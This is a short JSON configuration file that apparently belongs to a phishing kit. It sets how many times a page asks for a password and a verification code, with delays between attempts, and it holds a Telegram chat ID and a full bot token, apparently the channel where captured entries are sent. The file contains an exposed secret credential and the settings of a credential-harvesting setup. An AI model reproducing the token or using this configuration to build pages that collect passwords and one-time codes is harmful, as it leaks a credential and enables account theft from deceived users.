{
	"websiteConfig": {
		"maxPasswordAttempts": 2,
		"maxCodeAttempts": 3,
		"delayPasswordTime": 2000,
		"delayCodeTime": 1000
	},
	"telegram": {
		"chatId": "2092843480",
		"token": "7871847530:AAH7N5hrK9ETDRbeiqen2ATQVSwkFIZG0go"
	}
}
